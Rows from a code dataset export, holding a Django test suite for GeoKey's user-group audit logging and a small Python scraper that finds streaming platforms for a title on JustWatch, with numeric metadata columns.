| 31.614458 | 104 | 0.680259 | 307 | 2,624 | 5.472313 | 0.162866 | 0.151786 | 0.180952 | 0.109524 | 0.758929 | 0.727381 | 0.711905 | 0.663095 | 0.663095 | 0.663095 | 0 | 0.005266 | 0.203887 | 2,624 | 82 | 105 | 32 | 0.798947 | 0.052591 | 0 | 0.568966 | 0 | 0 | 0.069971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.310345 | false | 0.034483 | 0.034483 | 0.189655 | 0.637931 | 0.068966 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d8a6fbee4a75cbb580d2481a6a81480dc85a01a7 | 17,259 | py | Python | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | geokey/core/tests/logger/test_log_usergroup.py | universityofsussex/geokey | 25e161dbc81841c57c148053dbe99facc81e84b8 | [
"Apache-2.0"
] | null | null | null | """Tests for logger: model UserGroup."""
from django.test import TestCase
from geokey.core.models import LoggerHistory
from geokey.users.tests.model_factories import UserFactory
from geokey.projects.tests.model_factories import ProjectFactory
from geokey.users.tests.model_factories import UserGroupFactory
class LogUserGroupTest(TestCase):
"""Test model UserGroup."""
def setUp(self):
"""Set up test."""
self.user = UserFactory.create()
self.project = ProjectFactory.create(**{
'creator': self.user})
self.usergroup = UserGroupFactory.create(**{
'project': self.project})
def test_log_create(self):
"""Test when user group gets created."""
log_count_init = LoggerHistory.objects.count()
usergroup = UserGroupFactory.create(**{
'project': self.project})
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(usergroup.id),
'name': usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'created',
'class': 'UserGroup'})
self.assertEqual(log_count, log_count_init + 1)
self.assertEqual(log.historical, None)
def test_log_delete(self):
"""Test when user group gets deleted."""
usergroup_id = self.usergroup.id
usergroup_name = self.usergroup.name
log_count_init = LoggerHistory.objects.count()
self.usergroup.delete()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(usergroup_id),
'name': usergroup_name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'deleted',
'class': 'UserGroup'})
self.assertEqual(log_count, log_count_init + 1)
self.assertEqual(log.historical, None)
def test_log_update_name(self):
"""Test when name changes."""
log_count_init = LoggerHistory.objects.count()
original_name = self.usergroup.name
self.usergroup.name = '%s UPDATED' % self.usergroup.name
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'name'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.name, original_name)
def test_log_update_can_contribute(self):
"""Test when setting gets set to `can contribute`."""
self.usergroup.can_contribute = False
self.usergroup.can_moderate = False
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = True
self.usergroup.can_moderate = False
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_contribute',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
self.usergroup.can_contribute = False
self.usergroup.can_moderate = True
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = True
self.usergroup.can_moderate = False
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_contribute',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
def test_log_update_can_moderate(self):
"""Test when setting gets set to `can moderate`."""
self.usergroup.can_contribute = False
self.usergroup.can_moderate = False
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = True
self.usergroup.can_moderate = True
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_moderate',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
self.usergroup.can_contribute = True
self.usergroup.can_moderate = False
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = True
self.usergroup.can_moderate = True
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_moderate',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
def test_log_update_can_view(self):
"""Test when setting gets set to `can view`."""
self.usergroup.can_contribute = True
self.usergroup.can_moderate = False
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = False
self.usergroup.can_moderate = False
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_view',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
self.usergroup.can_contribute = True
self.usergroup.can_moderate = True
self.usergroup.save()
log_count_init = LoggerHistory.objects.count()
original_can_contribute = self.usergroup.can_contribute
original_can_moderate = self.usergroup.can_moderate
self.usergroup.can_contribute = False
self.usergroup.can_moderate = False
self.usergroup.save()
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup',
'field': 'can_view',
'value': 'True'})
self.assertEqual(log_count, log_count_init + 1)
history = self.usergroup.history.get(pk=log.historical.get('id'))
self.assertEqual(history.id, self.usergroup.id)
self.assertEqual(history.can_contribute, original_can_contribute)
self.assertEqual(history.can_moderate, original_can_moderate)
def test_log_add_user(self):
"""Test when user is added."""
log_count_init = LoggerHistory.objects.count()
new_user = UserFactory.create()
self.usergroup.users.add(new_user)
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup_users',
'subaction': 'add',
'user_id': str(new_user.id),
'user_display_name': new_user.display_name})
self.assertEqual(log_count, log_count_init + 1)
self.assertEqual(log.historical, None)
def test_log_remove_user(self):
"""Test when user is removed."""
existing_user = UserFactory.create()
self.usergroup.users.add(existing_user)
log_count_init = LoggerHistory.objects.count()
self.usergroup.users.remove(existing_user)
log = LoggerHistory.objects.last()
log_count = LoggerHistory.objects.count()
self.assertNotEqual(log.user, {
'id': str(self.user.id),
'display_name': self.user.display_name})
self.assertEqual(log.project, {
'id': str(self.project.id),
'name': self.project.name})
self.assertEqual(log.usergroup, {
'id': str(self.usergroup.id),
'name': self.usergroup.name})
self.assertEqual(log.category, None)
self.assertEqual(log.field, None)
self.assertEqual(log.location, None)
self.assertEqual(log.observation, None)
self.assertEqual(log.comment, None)
self.assertEqual(log.subset, None)
self.assertEqual(log.action, {
'id': 'updated',
'class': 'UserGroup_users',
'subaction': 'remove',
'user_id': str(existing_user.id),
'user_display_name': existing_user.display_name})
self.assertEqual(log_count, log_count_init + 1)
self.assertEqual(log.historical, None)
| 40.801418 | 73 | 0.624544 | 1,893 | 17,259 | 5.565769 | 0.044374 | 0.190774 | 0.194761 | 0.137813 | 0.942863 | 0.929005 | 0.902809 | 0.882973 | 0.864939 | 0.86456 | 0 | 0.000853 | 0.252912 | 17,259 | 422 | 74 | 40.898104 | 0.816271 | 0.020337 | 0 | 0.882038 | 0 | 0 | 0.049371 | 0 | 0 | 0 | 0 | 0 | 0.38874 | 1 | 0.024129 | false | 0 | 0.013405 | 0 | 0.040214 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d8d7d3562b4cd33dd6faf2cb5501165dadb8c297 | 2,477 | py | Python | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | src/stream-finder/streamfinder.py | Debangshu-Chakraborty/stream-finder | b387b8017ced73a7e3de87eca63ee531c2421047 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 21 11:37:29 2022
@author: debangshu
"""
import requests
from bs4 import BeautifulSoup
def format_title(title):
title=title.lower()
title_tokens=title.split(' ')
title='-'.join(title_tokens)
return title
def find_movie(title):
try:
title=format_title(title)
url="https://www.justwatch.com/in/movie/"+title
r = requests.get(url, allow_redirects=True)
soup=BeautifulSoup(r.content,'html.parser')
platforms_list=soup.find("div",{"class":"price-comparison__grid__row price-comparison__grid__row--stream"})
# platforms_list=soup.find("div",{"class":"price-comparison__grid__row__holder"})
# print(platforms_list)
children=platforms_list.findChildren()
platforms=[]
for child in children:
platforms.append(str(child))
streams=[]
for platform in platforms:
if platform.find('class="price-comparison__grid__row__icon"') and platform[0:4]=="<img":
stream=platform[10:]
end=stream.find("\"")
stream=stream[:end]
streams.append(stream)
#No streaming services found
if len(streams)==0:
return False
return streams
except:
return "Unable to fetch info"
def find_tvseries(title):
try:
title=format_title(title)
url="https://www.justwatch.com/in/tv-show/"+title
r = requests.get(url, allow_redirects=True)
soup=BeautifulSoup(r.content,'html.parser')
platforms_list=soup.find("div",{"class":"price-comparison__grid__row price-comparison__grid__row--stream"})
# platforms_list=soup.find("div",{"class":"price-comparison__grid__row__holder"})
# print(platforms_list)
children=platforms_list.findChildren()
platforms=[]
for child in children:
platforms.append(str(child))
streams=[]
for platform in platforms:
if platform.find('class="price-comparison__grid__row__icon"') and platform[0:4]=="<img":
stream=platform[10:]
end=stream.find("\"")
stream=stream[:end]
streams.append(stream)
#No streaming services found
if len(streams)==0:
return False
return streams
except:
return "Unable to fetch info"
| 31.35443 | 115 | 0.600323 | 280 | 2,477 | 5.107143 | 0.307143 | 0.072727 | 0.106294 | 0.123077 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0.848951 | 0 | 0.013385 | 0.27614 | 2,477 | 78 | 116 | 31.75641 | 0.784161 | 0.135648 | 0 | 0.792453 | 0 | 0 | 0.173954 | 0.09685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.